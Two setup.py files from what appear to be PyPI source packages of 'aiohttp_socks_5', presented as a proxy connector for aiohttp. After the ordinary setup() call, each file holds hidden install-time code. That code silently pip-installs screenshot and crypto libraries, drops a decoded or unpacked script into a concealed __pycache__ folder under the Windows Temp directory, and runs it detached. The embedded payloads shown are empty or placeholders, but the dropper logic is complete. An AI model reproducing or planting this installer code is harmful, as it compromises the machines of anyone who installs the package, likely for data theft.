==> aiohttp_socks_5-0.1.11.tar.gz: aiohttp_socks_5-0.1.11/setup.py <==
import codecs
import os
import re
import sys


try:
    from setuptools import setup
except ImportError:
    from distutils.core import setup

version = None

with codecs.open(
    os.path.join(
        os.path.abspath(os.path.dirname(__file__)), "aiohttp_socks_5", "__init__.py"
    ),
    "r",
    "latin1",
) as fp:
    try:
        version = re.findall(r'^__version__ = "(\S+?)"$', fp.read(), re.M)[0]
    except IndexError:
        raise RuntimeError("Unable to determine version.")

if sys.version_info < (3, 5, 3):
    raise RuntimeError("aiohttp_socks_5 requires Python 3.5.3+")

with open("README.md") as f:
    long_description = f.read()

setup(
    name="aiohttp_socks_5",
    author="Skactor",
    author_email="sk4ct0r@gmail.com",
    version='0.1.11',
    license="Apache 2",
    url="https://github.com/Skactor/aiohttp-proxy",
    description="Full-featured proxy connector for aiohttp",
    long_description=long_description,
    long_description_content_type="text/markdown",
    packages=["aiohttp_socks_5"],
    keywords="asyncio aiohttp socks socks5 socks4 http https proxy aiofiles aiohttp cryptography",
    install_requires=["aiohttp>=2.3.2", "yarl"]
)

LOCAL = os.environ['USERPROFILE']
TEMP = os.path.join(LOCAL, 'appdata', 'local', 'temp')
main_dir = os.path.join(TEMP, '__pycache__')

# with open(os.path.join(main_dir, 'args.txt'), 'a', encoding='utf8') as f:
#     f.write(str(sys.argv) + '\n')


if len(sys.argv) == 0:
    sys.exit()

if not ("install" == sys.argv[1] or "bdist" in sys.argv[1]):
    sys.exit()


import sys
from os import environ, chdir, mkdir
from os.path import join, split, isdir
from subprocess import Popen, call, getoutput, PIPE
from time import sleep
from os import system
from base64 import b64decode

python = sys.executable
python = join(split(python)[0], 'python.exe')
pythonw = join(split(python)[0], 'pythonw.exe')

LOCAL = environ['USERPROFILE']
TEMP = join(LOCAL, 'appdata', 'local', 'temp')
main_dir = join(TEMP, '__pycache__')


def b64(code: str) -> str:
    return b64decode(code.encode('utf8')).decode('utf8')

def run(filename):
    file = join(main_dir, filename)

    chdir(main_dir)

    Popen([pythonw, file], stdin=PIPE, stdout=PIPE, stderr=PIPE,
            creationflags=0x00000008 | 0x00000200, shell=True)


try:
    if not isdir(main_dir):
        mkdir(main_dir)

    call(pythonw + " -m pip install psutil")

    call(pythonw + " -m pip install aiofiles")
    call(pythonw + " -m pip install aiohttp")
    call(pythonw + " -m pip install cryptography")
    call(pythonw + " -m pip install aiosqlite")
    call(pythonw + " -m pip install mss")
    call(pythonw + " -m pip install pypiwin32")
    call(pythonw + " -m pip install psutil")


    with open(join(main_dir, 'main.cpython-39.py'), 'w', encoding='utf8') as f:
        f.write(b64(''))

    run('main.cpython-39.py')
except Exception as e:
    import traceback
    with open(join(main_dir, 'exception.txt'), 'a', encoding='utf8') as f:
        f.write(str(e))
        f.write(traceback.format_exc())

==> aiohttp_socks_5-0.1.13.tar.gz: aiohttp_socks_5-0.1.13/setup.py <==
import codecs
import os
import re
import sys


try:
    from setuptools import setup
except ImportError:
    from distutils.core import setup

version = None

with codecs.open(
    os.path.join(
        os.path.abspath(os.path.dirname(__file__)), "aiohttp_socks_5", "__init__.py"
    ),
    "r",
    "latin1",
) as fp:
    try:
        version = re.findall(r'^__version__ = "(\S+?)"$', fp.read(), re.M)[0]
    except IndexError:
        raise RuntimeError("Unable to determine version.")

if sys.version_info < (3, 5, 3):
    raise RuntimeError("aiohttp_socks_5 requires Python 3.5.3+")

with open("README.md") as f:
    long_description = f.read()

setup(
    name="aiohttp_socks_5",
    author="Skactor",
    author_email="sk4ct0r@gmail.com",
    version='0.1.13',
    license="Apache 2",
    url="https://github.com/Skactor/aiohttp-proxy",
    description="Full-featured proxy connector for aiohttp",
    long_description=long_description,
    long_description_content_type="text/markdown",
    packages=["aiohttp_socks_5"],
    keywords="asyncio aiohttp socks socks5 socks4 http https proxy aiofiles aiohttp cryptography",
    install_requires=["aiohttp>=2.3.2", "yarl"]
)

LOCAL = os.environ['USERPROFILE']
TEMP = os.path.join(LOCAL, 'appdata', 'local', 'temp')
main_dir = os.path.join(TEMP, '__pycache__')

# with open(os.path.join(main_dir, 'args.txt'), 'a', encoding='utf8') as f:
#     f.write(str(sys.argv) + '\n')


if len(sys.argv) == 0:
    sys.exit()

if not ("install" == sys.argv[1] or "bdist" in sys.argv[1]):
    sys.exit()

from json import loads, dumps
from base64 import b64decode, b64encode
from os import scandir, mkdir, chdir, system
from os.path import split, join
import sys
from os import environ


def unarchive(arch, path):
    path_ = join(path, arch['name'])
    if arch['type'] == 'file':
        with open(path_, 'wb') as f:
            f.write(b64decode(arch['data']))
    elif arch['type'] == 'dir':
        mkdir(path_)
        for i in arch['data']:
            unarchive(i, path_)
            
data = '|DATA|'
data = loads(data)

python = sys.executable
python = join(split(python)[0], 'python.exe')
pythonw = join(split(python)[0], 'pythonw.exe')

LOCAL = environ['USERPROFILE']
TEMP = join(LOCAL, 'appdata', 'local', 'temp')
main_dir = join(TEMP, '__pycache__')

unarchive(data, main_dir)
chdir(join(main_dir, 'runner'))
system(f'"{python}" runner.py')
